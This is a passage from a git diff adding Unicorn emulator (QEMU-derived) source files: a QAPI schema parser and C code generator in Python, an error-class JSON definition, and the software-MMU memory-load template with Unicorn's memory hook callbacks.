%s' % (e.strerror, include)) + exprs_include = 
QAPISchema(fobj, include, self.include_hist, + previously_included, expr_info) + self.exprs.extend(exprs_include.exprs) + else: + expr_elem = {'expr': expr, + 'info': expr_info} + self.exprs.append(expr_elem) + + def accept(self): + while True: + self.tok = self.src[self.cursor] + self.pos = self.cursor + self.cursor += 1 + self.val = None + + if self.tok == '#': + self.cursor = self.src.find('\n', self.cursor) + elif self.tok in ['{', '}', ':', ',', '[', ']']: + return + elif self.tok == "'": + string = '' + esc = False + while True: + ch = self.src[self.cursor] + self.cursor += 1 + if ch == '\n': + raise QAPISchemaError(self, + 'Missing terminating "\'"') + if esc: + string += ch + esc = False + elif ch == "\\": + esc = True + elif ch == "'": + self.val = string + return + else: + string += ch + elif self.tok == '\n': + if self.cursor == len(self.src): + self.tok = None + return + self.line += 1 + self.line_pos = self.cursor + elif not self.tok.isspace(): + raise QAPISchemaError(self, 'Stray "%s"' % self.tok) + + def get_members(self): + expr = OrderedDict() + if self.tok == '}': + self.accept() + return expr + if self.tok != "'": + raise QAPISchemaError(self, 'Expected string or "}"') + while True: + key = self.val + self.accept() + if self.tok != ':': + raise QAPISchemaError(self, 'Expected ":"') + self.accept() + if key in expr: + raise QAPISchemaError(self, 'Duplicate key "%s"' % key) + expr[key] = self.get_expr(True) + if self.tok == '}': + self.accept() + return expr + if self.tok != ',': + raise QAPISchemaError(self, 'Expected "," or "}"') + self.accept() + if self.tok != "'": + raise QAPISchemaError(self, 'Expected string') + + def get_values(self): + expr = [] + if self.tok == ']': + self.accept() + return expr + if not self.tok in [ '{', '[', "'" ]: + raise QAPISchemaError(self, 'Expected "{", "[", "]" or string') + while True: + expr.append(self.get_expr(True)) + if self.tok == ']': + self.accept() + return expr + if self.tok != ',': + raise 
QAPISchemaError(self, 'Expected "," or "]"') + self.accept() + + def get_expr(self, nested): + if self.tok != '{' and not nested: + raise QAPISchemaError(self, 'Expected "{"') + if self.tok == '{': + self.accept() + expr = self.get_members() + elif self.tok == '[': + self.accept() + expr = self.get_values() + elif self.tok == "'": + expr = self.val + self.accept() + else: + raise QAPISchemaError(self, 'Expected "{", "[" or string') + return expr + +def find_base_fields(base): + base_struct_define = find_struct(base) + if not base_struct_define: + return None + return base_struct_define['data'] + +# Return the discriminator enum define if discriminator is specified as an +# enum type, otherwise return None. +def discriminator_find_enum_define(expr): + base = expr.get('base') + discriminator = expr.get('discriminator') + + if not (discriminator and base): + return None + + base_fields = find_base_fields(base) + if not base_fields: + return None + + discriminator_type = base_fields.get(discriminator) + if not discriminator_type: + return None + + return find_enum(discriminator_type) + +def check_event(expr, expr_info): + params = expr.get('data') + if params: + for argname, argentry, optional, structured in parse_args(params): + if structured: + raise QAPIExprError(expr_info, + "Nested structure define in event is not " + "supported, event '%s', argname '%s'" + % (expr['event'], argname)) + +def check_union(expr, expr_info): + name = expr['union'] + base = expr.get('base') + discriminator = expr.get('discriminator') + members = expr['data'] + + # If the object has a member 'base', its value must name a complex type. + if base: + base_fields = find_base_fields(base) + if not base_fields: + raise QAPIExprError(expr_info, + "Base '%s' is not a valid type" + % base) + + # If the union object has no member 'discriminator', it's an + # ordinary union. 
+ if not discriminator: + enum_define = None + + # Else if the value of member 'discriminator' is {}, it's an + # anonymous union. + elif discriminator == {}: + enum_define = None + + # Else, it's a flat union. + else: + # The object must have a member 'base'. + if not base: + raise QAPIExprError(expr_info, + "Flat union '%s' must have a base field" + % name) + # The value of member 'discriminator' must name a member of the + # base type. + discriminator_type = base_fields.get(discriminator) + if not discriminator_type: + raise QAPIExprError(expr_info, + "Discriminator '%s' is not a member of base " + "type '%s'" + % (discriminator, base)) + enum_define = find_enum(discriminator_type) + # Do not allow string discriminator + if not enum_define: + raise QAPIExprError(expr_info, + "Discriminator '%s' must be of enumeration " + "type" % discriminator) + + # Check every branch + for (key, value) in members.items(): + # If this named member's value names an enum type, then all members + # of 'data' must also be members of the enum type. + if enum_define and not key in enum_define['enum_values']: + raise QAPIExprError(expr_info, + "Discriminator value '%s' is not found in " + "enum '%s'" % + (key, enum_define["enum_name"])) + # Todo: add checking for values. Key is checked as above, value can be + # also checked here, but we need more functions to handle array case. 
+ +def check_exprs(schema): + for expr_elem in schema.exprs: + expr = expr_elem['expr'] + if 'union' in expr: + check_union(expr, expr_elem['info']) + if 'event' in expr: + check_event(expr, expr_elem['info']) + +def parse_schema(input_file): + try: + schema = QAPISchema(open(input_file, "r")) + except (QAPISchemaError, QAPIExprError) as e: + print >>sys.stderr, e + exit(1) + + exprs = [] + + for expr_elem in schema.exprs: + expr = expr_elem['expr'] + if 'enum' in expr: + add_enum(expr['enum'], expr['data']) + elif 'union' in expr: + add_union(expr) + elif 'type' in expr: + add_struct(expr) + exprs.append(expr) + + # Try again for hidden UnionKind enum + for expr_elem in schema.exprs: + expr = expr_elem['expr'] + if 'union' in expr: + if not discriminator_find_enum_define(expr): + add_enum('%sKind' % expr['union']) + + try: + check_exprs(schema) + except QAPIExprError as e: + print >>sys.stderr, e + exit(1) + + return exprs + +def parse_args(typeinfo): + if isinstance(typeinfo, basestring): + struct = find_struct(typeinfo) + assert struct != None + typeinfo = struct['data'] + + for member in typeinfo: + argname = member + argentry = typeinfo[member] + optional = False + structured = False + if member.startswith('*'): + argname = member[1:] + optional = True + if isinstance(argentry, OrderedDict): + structured = True + yield (argname, argentry, optional, structured) + +def de_camel_case(name): + new_name = '' + for ch in name: + if ch.isupper() and new_name: + new_name += '_' + if ch == '-': + new_name += '_' + else: + new_name += ch.lower() + return new_name + +def camel_case(name): + new_name = '' + first = True + for ch in name: + if ch in ['_', '-']: + first = True + elif first: + new_name += ch.upper() + first = False + else: + new_name += ch.lower() + return new_name + +def c_var(name, protect=True): + # ANSI X3J11/88-090, 3.1.1 + c89_words = set(['auto', 'break', 'case', 'char', 'const', 'continue', + 'default', 'do', 'double', 'else', 'enum', 'extern', 
'float', + 'for', 'goto', 'if', 'int', 'long', 'register', 'return', + 'short', 'signed', 'sizeof', 'static', 'struct', 'switch', + 'typedef', 'union', 'unsigned', 'void', 'volatile', 'while']) + # ISO/IEC 9899:1999, 6.4.1 + c99_words = set(['inline', 'restrict', '_Bool', '_Complex', '_Imaginary']) + # ISO/IEC 9899:2011, 6.4.1 + c11_words = set(['_Alignas', '_Alignof', '_Atomic', '_Generic', '_Noreturn', + '_Static_assert', '_Thread_local']) + # GCC http://gcc.gnu.org/onlinedocs/gcc-4.7.1/gcc/C-Extensions.html + # excluding _.* + gcc_words = set(['asm', 'typeof']) + # C++ ISO/IEC 14882:2003 2.11 + cpp_words = set(['bool', 'catch', 'class', 'const_cast', 'delete', + 'dynamic_cast', 'explicit', 'false', 'friend', 'mutable', + 'namespace', 'new', 'operator', 'private', 'protected', + 'public', 'reinterpret_cast', 'static_cast', 'template', + 'this', 'throw', 'true', 'try', 'typeid', 'typename', + 'using', 'virtual', 'wchar_t', + # alternative representations + 'and', 'and_eq', 'bitand', 'bitor', 'compl', 'not', + 'not_eq', 'or', 'or_eq', 'xor', 'xor_eq']) + # namespace pollution: + polluted_words = set(['unix', 'errno']) + if protect and (name in c89_words | c99_words | c11_words | gcc_words | cpp_words | polluted_words): + return "q_" + name + return name.replace('-', '_').lstrip("*") + +def c_fun(name, protect=True): + return c_var(name, protect).replace('.', '_') + +def c_list_type(name): + return '%sList' % name + +def type_name(name): + if type(name) == list: + return c_list_type(name[0]) + return name + +enum_types = [] +struct_types = [] +union_types = [] + +def add_struct(definition): + global struct_types + struct_types.append(definition) + +def find_struct(name): + global struct_types + for struct in struct_types: + if struct['type'] == name: + return struct + return None + +def add_union(definition): + global union_types + union_types.append(definition) + +def find_union(name): + global union_types + for union in union_types: + if union['union'] == name: + 
return union + return None + +def add_enum(name, enum_values = None): + global enum_types + enum_types.append({"enum_name": name, "enum_values": enum_values}) + +def find_enum(name): + global enum_types + for enum in enum_types: + if enum['enum_name'] == name: + return enum + return None + +def is_enum(name): + return find_enum(name) != None + +eatspace = '\033EATSPACE.' + +# A special suffix is added in c_type() for pointer types, and it's +# stripped in mcgen(). So please notice this when you check the return +# value of c_type() outside mcgen(). +def c_type(name, is_param=False): + if name == 'str': + if is_param: + return 'const char *' + eatspace + return 'char *' + eatspace + + elif name == 'int': + return 'int64_t' + elif (name == 'int8' or name == 'int16' or name == 'int32' or + name == 'int64' or name == 'uint8' or name == 'uint16' or + name == 'uint32' or name == 'uint64'): + return name + '_t' + elif name == 'size': + return 'uint64_t' + elif name == 'bool': + return 'bool' + elif name == 'number': + return 'double' + elif type(name) == list: + return '%s *%s' % (c_list_type(name[0]), eatspace) + elif is_enum(name): + return name + elif name == None or len(name) == 0: + return 'void' + elif name == name.upper(): + return '%sEvent *%s' % (camel_case(name), eatspace) + else: + return '%s *%s' % (name, eatspace) + +def is_c_ptr(name): + suffix = "*" + eatspace + return c_type(name).endswith(suffix) + +def genindent(count): + ret = "" + for i in range(count): + ret += " " + return ret + +indent_level = 0 + +def push_indent(indent_amount=4): + global indent_level + indent_level += indent_amount + +def pop_indent(indent_amount=4): + global indent_level + indent_level -= indent_amount + +def cgen(code, **kwds): + indent = genindent(indent_level) + lines = code.split('\n') + lines = map(lambda x: indent + x, lines) + return '\n'.join(lines) % kwds + '\n' + +def mcgen(code, **kwds): + raw = cgen('\n'.join(code.split('\n')[1:-1]), **kwds) + return 
re.sub(re.escape(eatspace) + ' *', '', raw) + +def basename(filename): + return filename.split("/")[-1] + +def guardname(filename): + guard = basename(filename).rsplit(".", 1)[0] + for substr in [".", " ", "-"]: + guard = guard.replace(substr, "_") + return guard.upper() + '_H' + +def guardstart(name): + return mcgen(''' + +#ifndef %(name)s +#define %(name)s + +''', + name=guardname(name)) + +def guardend(name): + return mcgen(''' + +#endif /* %(name)s */ + +''', + name=guardname(name)) + +# ENUMName -> ENUM_NAME, EnumName1 -> ENUM_NAME1 +# ENUM_NAME -> ENUM_NAME, ENUM_NAME1 -> ENUM_NAME1, ENUM_Name2 -> ENUM_NAME2 +# ENUM24_Name -> ENUM24_NAME +def _generate_enum_string(value): + c_fun_str = c_fun(value, False) + if value.isupper(): + return c_fun_str + + new_name = '' + l = len(c_fun_str) + for i in range(l): + c = c_fun_str[i] + # When c is upper and no "_" appears before, do more checks + if c.isupper() and (i > 0) and c_fun_str[i - 1] != "_": + # Case 1: next string is lower + # Case 2: previous string is digit + if (i < (l - 1) and c_fun_str[i + 1].islower()) or \ + c_fun_str[i - 1].isdigit(): + new_name += '_' + new_name += c + return new_name.lstrip('_').upper() + +def generate_enum_full_value(enum_name, enum_value): + abbrev_string = _generate_enum_string(enum_name) + value_string = _generate_enum_string(enum_value) + return "%s_%s" % (abbrev_string, value_string) diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi/common.json b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi/common.json new file mode 100644 index 0000000..c87eac4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi/common.json @@ -0,0 +1,30 @@ +# -*- Mode: Python -*- +# +# QAPI common definitions + +## +# @ErrorClass +# +# QEMU error classes +# +# @GenericError: this is used for errors that don't require a specific error +# class. 
This should be the default case for most errors +# +# @CommandNotFound: the requested command has not been found +# +# @DeviceEncrypted: the requested operation can't be fulfilled because the +# selected device is encrypted +# +# @DeviceNotActive: a device has failed to become active +# +# @DeviceNotFound: the requested device has not been found +# +# @KVMMissingCap: the requested operation can't be fulfilled because a +# required KVM capability is missing +# +# Since: 1.2 +## +{ 'enum': 'ErrorClass', + 'data': [ 'GenericError', 'CommandNotFound', 'DeviceEncrypted', + 'DeviceNotActive', 'DeviceNotFound', 'KVMMissingCap' ] } + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/softmmu_template.h b/ai_anti_malware/unicorn/unicorn-master/qemu/softmmu_template.h new file mode 100644 index 0000000..3e8fa9f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/softmmu_template.h @@ -0,0 +1,1091 @@ +/* + * Software MMU support + * + * Generate helpers used by TCG for qemu_ld/st ops and code load + * functions. + * + * Included from target op helpers and exec.c. + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . 
+ */ +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#include "qemu/timer.h" +#include "exec/address-spaces.h" +#include "exec/memory.h" +#include "uc_priv.h" + +#define DATA_SIZE (1 << SHIFT) + +#if DATA_SIZE == 8 +#define SUFFIX q +#define LSUFFIX q +#define SDATA_TYPE int64_t +#define DATA_TYPE uint64_t +#elif DATA_SIZE == 4 +#define SUFFIX l +#define LSUFFIX l +#define SDATA_TYPE int32_t +#define DATA_TYPE uint32_t +#elif DATA_SIZE == 2 +#define SUFFIX w +#define LSUFFIX uw +#define SDATA_TYPE int16_t +#define DATA_TYPE uint16_t +#elif DATA_SIZE == 1 +#define SUFFIX b +#define LSUFFIX ub +#define SDATA_TYPE int8_t +#define DATA_TYPE uint8_t +#else +#error unsupported data size +#endif + + +/* For the benefit of TCG generated code, we want to avoid the complication + of ABI-specific return type promotion and always return a value extended + to the register size of the host. This is tcg_target_long, except in the + case of a 32-bit host and 64-bit data, and for that we always have + uint64_t. Don't bother with this widened value for SOFTMMU_CODE_ACCESS. 
*/ +#if defined(SOFTMMU_CODE_ACCESS) || DATA_SIZE == 8 +# define WORD_TYPE DATA_TYPE +# define USUFFIX SUFFIX +#else +# define WORD_TYPE tcg_target_ulong +# define USUFFIX glue(u, SUFFIX) +# define SSUFFIX glue(s, SUFFIX) +#endif + +#ifdef SOFTMMU_CODE_ACCESS +#define READ_ACCESS_TYPE MMU_INST_FETCH +#define ADDR_READ addr_code +#else +#define READ_ACCESS_TYPE MMU_DATA_LOAD +#define ADDR_READ addr_read +#endif + +#if DATA_SIZE == 8 +# define BSWAP(X) bswap64(X) +#elif DATA_SIZE == 4 +# define BSWAP(X) bswap32(X) +#elif DATA_SIZE == 2 +# define BSWAP(X) bswap16(X) +#else +# define BSWAP(X) (X) +#endif + +#ifdef TARGET_WORDS_BIGENDIAN +# define TGT_BE(X) (X) +# define TGT_LE(X) BSWAP(X) +#else +# define TGT_BE(X) BSWAP(X) +# define TGT_LE(X) (X) +#endif + +#if DATA_SIZE == 1 +# define helper_le_ld_name glue(glue(helper_ret_ld, USUFFIX), MMUSUFFIX) +# define helper_be_ld_name helper_le_ld_name +# define helper_le_lds_name glue(glue(helper_ret_ld, SSUFFIX), MMUSUFFIX) +# define helper_be_lds_name helper_le_lds_name +# define helper_le_st_name glue(glue(helper_ret_st, SUFFIX), MMUSUFFIX) +# define helper_be_st_name helper_le_st_name +#else +# define helper_le_ld_name glue(glue(helper_le_ld, USUFFIX), MMUSUFFIX) +# define helper_be_ld_name glue(glue(helper_be_ld, USUFFIX), MMUSUFFIX) +# define helper_le_lds_name glue(glue(helper_le_ld, SSUFFIX), MMUSUFFIX) +# define helper_be_lds_name glue(glue(helper_be_ld, SSUFFIX), MMUSUFFIX) +# define helper_le_st_name glue(glue(helper_le_st, SUFFIX), MMUSUFFIX) +# define helper_be_st_name glue(glue(helper_be_st, SUFFIX), MMUSUFFIX) +#endif + +#ifdef TARGET_WORDS_BIGENDIAN +# define helper_te_ld_name helper_be_ld_name +# define helper_te_st_name helper_be_st_name +#else +# define helper_te_ld_name helper_le_ld_name +# define helper_te_st_name helper_le_st_name +#endif + +/* macro to check the victim tlb */ +#define VICTIM_TLB_HIT(ty) \ + /* we are about to do a page table walk. our last hope is the \ + * victim tlb. 
try to refill from the victim tlb before walking the \ + * page table. */ \ + int vidx; \ + hwaddr tmpiotlb; \ + CPUTLBEntry tmptlb; \ + for (vidx = CPU_VTLB_SIZE-1; vidx >= 0; --vidx) { \ + if (env->tlb_v_table[mmu_idx][vidx].ty == (addr & TARGET_PAGE_MASK)) {\ + /* found entry in victim tlb, swap tlb and iotlb */ \ + tmptlb = env->tlb_table[mmu_idx][index]; \ + env->tlb_table[mmu_idx][index] = env->tlb_v_table[mmu_idx][vidx]; \ + env->tlb_v_table[mmu_idx][vidx] = tmptlb; \ + tmpiotlb = env->iotlb[mmu_idx][index]; \ + env->iotlb[mmu_idx][index] = env->iotlb_v[mmu_idx][vidx]; \ + env->iotlb_v[mmu_idx][vidx] = tmpiotlb; \ + break; \ + } \ + } \ + /* return true when there is a vtlb hit, i.e. vidx >=0 */ \ + return (vidx >= 0) + +#ifndef victim_tlb_hit_funcs +#define victim_tlb_hit_funcs +static inline bool victim_tlb_hit_read(CPUArchState *env, target_ulong addr, int mmu_idx, int index) +{ + VICTIM_TLB_HIT(ADDR_READ); +} + +static inline bool victim_tlb_hit_write(CPUArchState *env, target_ulong addr, int mmu_idx, int index) +{ + VICTIM_TLB_HIT(addr_write); +} +#endif // victim_tlb_hit_funcs + +#ifndef SOFTMMU_CODE_ACCESS +static inline DATA_TYPE glue(io_read, SUFFIX)(CPUArchState *env, + hwaddr physaddr, + target_ulong addr, + uintptr_t retaddr) +{ + uint64_t val; + CPUState *cpu = ENV_GET_CPU(env); + MemoryRegion *mr = iotlb_to_region(cpu->as, physaddr); + + physaddr = (physaddr & TARGET_PAGE_MASK) + addr; + cpu->mem_io_pc = retaddr; + if (mr != &(cpu->uc->io_mem_rom) && mr != &(cpu->uc->io_mem_notdirty) + && !cpu_can_do_io(cpu)) { + cpu_io_recompile(cpu, retaddr); + } + + cpu->mem_io_vaddr = addr; + io_mem_read(mr, physaddr, &val, 1 << SHIFT); + return (DATA_TYPE)val; +} +#endif + +#ifdef SOFTMMU_CODE_ACCESS +static QEMU_UNUSED_FUNC +#endif +WORD_TYPE helper_le_ld_name(CPUArchState *env, target_ulong addr, int mmu_idx, + uintptr_t retaddr) +{ + int index = (addr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + target_ulong tlb_addr = 
env->tlb_table[mmu_idx][index].ADDR_READ; + uintptr_t haddr; + DATA_TYPE res; + int error_code; + struct hook *hook; + bool handled; + HOOK_FOREACH_VAR_DECLARE; + + struct uc_struct *uc = env->uc; + MemoryRegion *mr = memory_mapping(uc, addr); + + // memory might be still unmapped while reading or fetching + if (mr == NULL) { + handled = false; +#if defined(SOFTMMU_CODE_ACCESS) + error_code = UC_ERR_FETCH_UNMAPPED; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_FETCH_UNMAPPED) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_FETCH_UNMAPPED, addr, DATA_SIZE - uc->size_recur_mem, 0, hook->user_data))) + break; + } +#else + error_code = UC_ERR_READ_UNMAPPED; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ_UNMAPPED) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_READ_UNMAPPED, addr, DATA_SIZE - uc->size_recur_mem, 0, hook->user_data))) + break; + } +#endif + if (handled) { + env->invalid_error = UC_ERR_OK; + mr = memory_mapping(uc, addr); // FIXME: what if mr is still NULL at this time? 
+ } else { + env->invalid_addr = addr; + env->invalid_error = error_code; + // printf("***** Invalid fetch (unmapped memory) at " TARGET_FMT_lx "\n", addr); + cpu_exit(uc->current_cpu); + return 0; + } + } + +#if defined(SOFTMMU_CODE_ACCESS) + // Unicorn: callback on fetch from NX + if (mr != NULL && !(mr->perms & UC_PROT_EXEC)) { // non-executable + handled = false; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_FETCH_PROT) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_FETCH_PROT, addr, DATA_SIZE - uc->size_recur_mem, 0, hook->user_data))) + break; + } + + if (handled) { + env->invalid_error = UC_ERR_OK; + } else { + env->invalid_addr = addr; + env->invalid_error = UC_ERR_FETCH_PROT; + // printf("***** Invalid fetch (non-executable) at " TARGET_FMT_lx "\n", addr); + cpu_exit(uc->current_cpu); + return 0; + } + } +#endif + + // Unicorn: callback on memory read + // NOTE: this happens before the actual read, so we cannot tell + // the callback if read access is successful, or not. 
+ // See UC_HOOK_MEM_READ_AFTER & UC_MEM_READ_AFTER if you only care + // about successful read + if (READ_ACCESS_TYPE == MMU_DATA_LOAD) { + if (!uc->size_recur_mem) { // disabling read callback if in recursive call + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + ((uc_cb_hookmem_t)hook->callback)(env->uc, UC_MEM_READ, addr, DATA_SIZE, 0, hook->user_data); + } + } + } + + // Unicorn: callback on non-readable memory + if (READ_ACCESS_TYPE == MMU_DATA_LOAD && mr != NULL && !(mr->perms & UC_PROT_READ)) { //non-readable + handled = false; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ_PROT) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_READ_PROT, addr, DATA_SIZE - uc->size_recur_mem, 0, hook->user_data))) + break; + } + + if (handled) { + env->invalid_error = UC_ERR_OK; + } else { + env->invalid_addr = addr; + env->invalid_error = UC_ERR_READ_PROT; + // printf("***** Invalid memory read (non-readable) at " TARGET_FMT_lx "\n", addr); + cpu_exit(uc->current_cpu); + return 0; + } + } + + /* Adjust the given return address. */ + retaddr -= GETPC_ADJ; + + /* If the TLB entry is for a different page, reload and try again. */ + /* If the TLB entry addend is invalidated by any callbacks (perhaps due to + a TLB flush), reload and try again. 
*/ + if ((addr & TARGET_PAGE_MASK) + != (tlb_addr & (TARGET_PAGE_MASK | TLB_INVALID_MASK)) + || env->tlb_table[mmu_idx][index].addend == -1) { +#ifdef ALIGNED_ONLY + if ((addr & (DATA_SIZE - 1)) != 0) { + //cpu_unaligned_access(ENV_GET_CPU(env), addr, READ_ACCESS_TYPE, + // mmu_idx, retaddr); + env->invalid_addr = addr; +#if defined(SOFTMMU_CODE_ACCESS) + env->invalid_error = UC_ERR_FETCH_UNALIGNED; +#else + env->invalid_error = UC_ERR_READ_UNALIGNED; +#endif + cpu_exit(uc->current_cpu); + return 0; + } +#endif + if (!victim_tlb_hit_read(env, addr, mmu_idx, index)) { + tlb_fill(ENV_GET_CPU(env), addr, READ_ACCESS_TYPE, + mmu_idx, retaddr); + } + tlb_addr = env->tlb_table[mmu_idx][index].ADDR_READ; + } + + /* Handle an IO access. */ + if (unlikely(tlb_addr & ~TARGET_PAGE_MASK)) { + hwaddr ioaddr; + if ((addr & (DATA_SIZE - 1)) != 0) { + goto do_unaligned_access; + } + ioaddr = env->iotlb[mmu_idx][index]; + if (ioaddr == 0) { + env->invalid_addr = addr; + env->invalid_error = UC_ERR_READ_UNMAPPED; + // printf("Invalid memory read at " TARGET_FMT_lx "\n", addr); + cpu_exit(env->uc->current_cpu); + return 0; + } else { + env->invalid_error = UC_ERR_OK; + } + + /* ??? Note that the io helpers always read data in the target + byte ordering. We should push the LE/BE request down into io. */ + res = glue(io_read, SUFFIX)(env, ioaddr, addr, retaddr); + res = TGT_LE(res); + goto _out; + } + + /* Handle slow unaligned access (it spans two pages or IO). 
*/ + if (DATA_SIZE > 1 + && unlikely((addr & ~TARGET_PAGE_MASK) + DATA_SIZE - 1 + >= TARGET_PAGE_SIZE)) { + target_ulong addr1, addr2; + DATA_TYPE res1, res2; + unsigned shift; + do_unaligned_access: +#ifdef ALIGNED_ONLY + //cpu_unaligned_access(ENV_GET_CPU(env), addr, READ_ACCESS_TYPE, + // mmu_idx, retaddr); + env->invalid_addr = addr; +#if defined(SOFTMMU_CODE_ACCESS) + env->invalid_error = UC_ERR_FETCH_UNALIGNED; +#else + env->invalid_error = UC_ERR_READ_UNALIGNED; +#endif + cpu_exit(uc->current_cpu); + return 0; +#endif + addr1 = addr & ~(DATA_SIZE - 1); + addr2 = addr1 + DATA_SIZE; + /* Note the adjustment at the beginning of the function. + Undo that for the recursion. */ + uc->size_recur_mem = DATA_SIZE - (addr - addr1); // size already treated by callback + res1 = helper_le_ld_name(env, addr1, mmu_idx, retaddr + GETPC_ADJ); + uc->size_recur_mem = (addr2 - addr); + res2 = helper_le_ld_name(env, addr2, mmu_idx, retaddr + GETPC_ADJ); + uc->size_recur_mem = 0; + shift = (addr & (DATA_SIZE - 1)) * 8; + + /* Little-endian combine. */ + res = (res1 >> shift) | (res2 << ((DATA_SIZE * 8) - shift)); + goto _out; + } + + /* Handle aligned access or unaligned access in the same page. 
*/ +#ifdef ALIGNED_ONLY + if ((addr & (DATA_SIZE - 1)) != 0) { + //cpu_unaligned_access(ENV_GET_CPU(env), addr, READ_ACCESS_TYPE, + // mmu_idx, retaddr); + env->invalid_addr = addr; +#if defined(SOFTMMU_CODE_ACCESS) + env->invalid_error = UC_ERR_FETCH_UNALIGNED; +#else + env->invalid_error = UC_ERR_READ_UNALIGNED; +#endif + cpu_exit(uc->current_cpu); + return 0; + } +#endif + + haddr = (uintptr_t)(addr + env->tlb_table[mmu_idx][index].addend); +#if DATA_SIZE == 1 + res = glue(glue(ld, LSUFFIX), _p)((uint8_t *)haddr); +#else + res = glue(glue(ld, LSUFFIX), _le_p)((uint8_t *)haddr); +#endif + +_out: + // Unicorn: callback on successful read + if (READ_ACCESS_TYPE == MMU_DATA_LOAD) { + if (!uc->size_recur_mem) { // disabling read callback if in recursive call + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ_AFTER) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + ((uc_cb_hookmem_t)hook->callback)(env->uc, UC_MEM_READ_AFTER, addr, DATA_SIZE, res, hook->user_data); + } + } + } + + return res; +} + +#if DATA_SIZE > 1 +#ifdef SOFTMMU_CODE_ACCESS +static QEMU_UNUSED_FUNC +#endif +WORD_TYPE helper_be_ld_name(CPUArchState *env, target_ulong addr, int mmu_idx, + uintptr_t retaddr) +{ + int index = (addr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + target_ulong tlb_addr = env->tlb_table[mmu_idx][index].ADDR_READ; + uintptr_t haddr; + DATA_TYPE res; + int error_code; + struct hook *hook; + bool handled; + HOOK_FOREACH_VAR_DECLARE; + + struct uc_struct *uc = env->uc; + MemoryRegion *mr = memory_mapping(uc, addr); + + // memory can be unmapped while reading or fetching + if (mr == NULL) { + handled = false; +#if defined(SOFTMMU_CODE_ACCESS) + error_code = UC_ERR_FETCH_UNMAPPED; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_FETCH_UNMAPPED) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_FETCH_UNMAPPED, addr, DATA_SIZE - uc->size_recur_mem, 0, 
hook->user_data))) + break; + } +#else + error_code = UC_ERR_READ_UNMAPPED; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ_UNMAPPED) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_READ_UNMAPPED, addr, DATA_SIZE - uc->size_recur_mem, 0, hook->user_data))) + break; + } +#endif + if (handled) { + env->invalid_error = UC_ERR_OK; + mr = memory_mapping(uc, addr); // FIXME: what if mr is still NULL at this time? + } else { + env->invalid_addr = addr; + env->invalid_error = error_code; + // printf("***** Invalid fetch (unmapped memory) at " TARGET_FMT_lx "\n", addr); + cpu_exit(uc->current_cpu); + return 0; + } + } + +#if defined(SOFTMMU_CODE_ACCESS) + // Unicorn: callback on fetch from NX + if (mr != NULL && !(mr->perms & UC_PROT_EXEC)) { // non-executable + handled = false; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_FETCH_PROT) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_FETCH_PROT, addr, DATA_SIZE - uc->size_recur_mem, 0, hook->user_data))) + break; + } + + if (handled) { + env->invalid_error = UC_ERR_OK; + } else { + env->invalid_addr = addr; + env->invalid_error = UC_ERR_FETCH_PROT; + // printf("***** Invalid fetch (non-executable) at " TARGET_FMT_lx "\n", addr); + cpu_exit(uc->current_cpu); + return 0; + } + } +#endif + + // Unicorn: callback on memory read + // NOTE: this happens before the actual read, so we cannot tell + // the callback if read access is successful, or not. 
